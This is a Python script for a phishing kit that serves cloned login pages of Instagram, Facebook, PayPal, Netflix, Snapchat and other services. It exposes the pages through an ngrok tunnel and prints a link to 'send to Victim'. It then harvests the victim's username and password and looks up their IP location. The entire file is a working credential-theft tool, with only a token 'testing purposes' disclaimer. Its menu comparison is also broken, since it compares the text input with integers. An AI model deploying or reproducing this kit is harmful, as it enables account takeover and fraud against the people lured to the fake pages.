#!/usr/bin/env python
# Phishing Pages generated by An0nUD4Y (https://github.com/An0nUD4Y):
# Instagram
# Phishing Pages generated by Social Fish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish):
# Facebook,SnapChat,Twitter
# Phishing Pages generated by @suljot_gjoka (https://github.com/whiteeagle0/blackeye):
# PayPal,Shopify,Messenger,Twitch,Myspace

import requests
import os
from re import *
import wget
import os.path
import  time
from bs4 import BeautifulSoup
from colorama import init, Fore, Back,Style
import sys
from requests.exceptions import ConnectionError


if os.name == "nt":
    sys.exit('Windows Sucks...!!!!')

os.system("killall -2 ngrok > /dev/null 2>&1")
os.system("killall -2 php > /dev/null 2>&1")
os.system('rm -r ip.txt > /dev/null 2>&1')
os.system('rm -r usernames.txt > /dev/null 2>&1')
os.system('clear')
print("""
     ___    _   _  _  ___    _   _  ___    ___   
    (  _`\ ( ) ( )(_)(  _`\ ( ) ( )(  _`\ |  _`\ 
    | |_) )| |_| || || (_(_)| |_| || (_(_)| (_) )
    | ,__/'|  _  || |`\__ \ |  _  ||  _)_ | ,  / 
    | |    | | | || |( )_) || | | || (_( )| |\ \ 
    (_)    (_) (_)(_)`\____)(_) (_)(____/'(_) (_)
            
            [+] Created By Himanshu Rahi [+]
            
       DISCLAIMER: This is only for testing purposes.
       Do not use this for illegal purposes, period

                (1) Instagram
                (2) Facebook
                (3) Instafollowers
                (4) Linkedin
                (5) Messenger
                (6) MySpace
                (7) netflix
                (8) Paypal
                (9) Pinterest
                (10) Snapchat
                (11) Spotify
                (12) Twitch
                (13) Twitter
                (14) Wordpress

    """)


def again():
    try:
        i = input("Enter Your Choice: ")

        if i == 1:
            os.system("cp -r 'sites/instagram'/* './'")
            server = "instagram"
        elif i == 2:
            os.system("cp -r 'sites/facebook'/* './'")
            server = "facebook"
        elif i == 3:
            os.system("cp -r 'sites/instafollowers'/* './'")
            server = "facebook"
        elif i == 4:
            os.system("cp -r 'sites/linkedin'/* './'")
            server = "facebook"
        elif i == 5:
            os.system("cp -r 'sites/messenger'/* './'")
            server = "messenger"
        elif i == 6:
            os.system("cp -r 'sites/myspace'/* './'")
            server = "myspace"
        elif i == 7:
            os.system("cp -r 'sites/netflix'/* './'")
            server = "netflix"
        elif i == 8:
            os.system("cp -r 'sites/paypal'/* './'")
            server = "paypal"
        elif i == 9:
            os.system("cp -r 'sites/pinterest'/* './'")
            server = "pinterest"
        elif i == 10:
            os.system("cp -r 'sites/snapchat'/* './'")
            server = "snapchat"
        elif i == 11:
            os.system("cp -r 'sites/spotify'/* './'")
            server = "spotify"
        elif i == 12:
            os.system("cp -r 'sites/twitch'/* './'")
            server = "twitch"
        elif i == 13:
            os.system("cp -r 'sites/twitter'/* './'")
            server = "twitter"
        elif i == 14:
            os.system("cp -r 'sites/wordpress'/* './'")
            server = "wordpress"
        else:
            print("Wrong Choice Bro.....")
            again()
        print("-" * 69)

        print(Style.BRIGHT+Fore.GREEN+"[+]Checking if Ngrok exist or not... :)"+Style.RESET_ALL)
        time.sleep(2)
        if (os.path.isfile('ngrok') == False):
            print(Style.BRIGHT+Fore.GREEN+"[+]Downloading......"+Style.RESET_ALL)
            url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip"
            file = wget.download(url)
            print(Style.BRIGHT + Fore.GREEN + "\n[+]Downloaded..." + Style.RESET_ALL)
            os.system("unzip ngrok-stable-linux-386.zip  > /dev/null")
            os.system("rm -rf ngrok-stable-linux-386.zip")


        else:
            pass
        print(Style.BRIGHT+Fore.GREEN+"[+]Starting Server..."+Style.RESET_ALL)
        os.system("php -S 127.0.0.1:1234 > /dev/null 2>&1 & sleep 2")
        time.sleep(2)
        print(Style.BRIGHT+Fore.GREEN+"[+]Starting Ngrok.."+Style.RESET_ALL)
        os.system("./ngrok http 1234 > /dev/null 2>&1 & sleep 10")
        f = requests.get("http://127.0.0.1:4040/status").text
        find = search(r"https://(.*).ngrok.io", str(f))
        print("-"*69)
        print(Style.BRIGHT+Fore.GREEN+"[+]Send this link to Victim--> " +Style.BRIGHT+Fore.BLUE+find.group().split("\\")[0]+Style.RESET_ALL)
        print("-"*69)


        print(Style.BRIGHT+Fore.GREEN+"[+]Waiting for credentials.."+Style.RESET_ALL)
        username = ""
        password = ""
        k = True
        while k:
            try:
                with open('usernames.txt', 'r') as a:

                    t = a.read()
                    u = search(r" (.*?)['P']", str(t))
                    username = u.group().split()[0]
                    p = search(r"Pass:(.*)", str(t))
                    password = p.group()[6:]
                    print(Style.BRIGHT+Fore.GREEN+"[+]Username: "+Style.RESET_ALL+ Style.BRIGHT+Fore.BLUE+ username+Style.RESET_ALL)
                    print(Style.BRIGHT+Fore.GREEN+"[+]Password: " +Style.RESET_ALL+ Style.BRIGHT+Fore.BLUE+password+Style.RESET_ALL)
                    k = False
            except:
                pass

        print("-"*69)
        with open("ip.txt", 'r') as f:
            IP = f.read().split()[1]
            get_ip_url = "https://tools.keycdn.com/geo?host=" + IP
            ip = requests.get(get_ip_url).text
            soup = BeautifulSoup(ip, 'html.parser');
            final = soup.findAll('td')
            print(Style.BRIGHT+Fore.GREEN+"IP: " + final[0].string+Style.RESET_ALL)
            print(Style.BRIGHT+Fore.GREEN+"Country: " + search(r"</span>[^<]*", str(final[3])).group().split('>')[1]+Style.RESET_ALL)
            print(Style.BRIGHT+Fore.GREEN+"Provider: " + search(r">[^<]*</a>", str(final[4])).group().split('>')[1].split('<')[0]+Style.RESET_ALL)
            print(Style.BRIGHT+Fore.GREEN+"Time Zone: " + str(final[11].string)+Style.RESET_ALL)
            print("-" * 69)

        files = os.listdir("sites/" + server)
        for i in files:
            os.system("rm -r "+i)
        os.system("rm -r ip.txt")
        os.system("rm -r usernames.txt")
    except KeyboardInterrupt:
        files = os.listdir("sites/" + server)
        for i in files:
            os.system("rm -r "+i)
        os.system("rm -r ip.txt")
        os.system("rm -r usernames.txt")
    except ConnectionError:
        print(Style.BRIGHT+Fore.RED+"No Internet Connection Bro...."+Style.RESET_ALL)
        sys.exit()


again()
